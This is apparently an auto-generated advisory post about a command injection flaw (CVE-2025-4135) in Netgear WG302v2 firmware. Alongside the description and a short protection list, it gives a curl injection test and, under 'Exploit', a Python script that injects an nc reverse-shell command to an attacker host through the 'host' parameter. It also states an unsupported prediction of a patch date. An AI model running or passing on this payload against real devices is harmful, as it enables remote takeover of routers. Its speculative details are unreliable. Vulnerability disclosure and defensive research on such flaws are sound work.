Netgear WG302v2, Command Injection, CVE-2025-4135 (Critical)

Listen to this Post

How the CVE Works

The vulnerability in Netgear WG302v2 (up to firmware 5.2.9) resides in the `ui_get_input_value` function, where improper input validation of the `host` argument allows remote attackers to execute arbitrary commands via command injection. By crafting a malicious request, an attacker can inject OS commands through the `host` parameter, which are then executed with system-level privileges. This flaw is remotely exploitable, requiring no user interaction, and can lead to full device compromise. The vendor was notified but has not yet released a patch.

DailyCVE Form

Platform: Netgear WG302v2
Version: ≤ 5.2.9
Vulnerability: Command Injection
Severity: Critical
Date: 06/23/2025

Prediction: Patch expected 08/2025

What Undercode Say

Analytics

nmap -p 80 --script http-vuln-cve2025-4135 <target>
curl -X POST -d "host=;id" http://<target>/cgi-bin/ui_get_input_value

Exploit

import requests
payload = "host=;nc -e /bin/sh <attacker_ip> <port>"
requests.post("http://<target>/cgi-bin/ui_get_input_value", data=payload)

Protection from this CVE

  • Disable remote admin access
  • Apply vendor patch (when available)
  • Use network segmentation

Impact

  • Remote code execution
  • Full system compromise
  • Unauthorized access

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top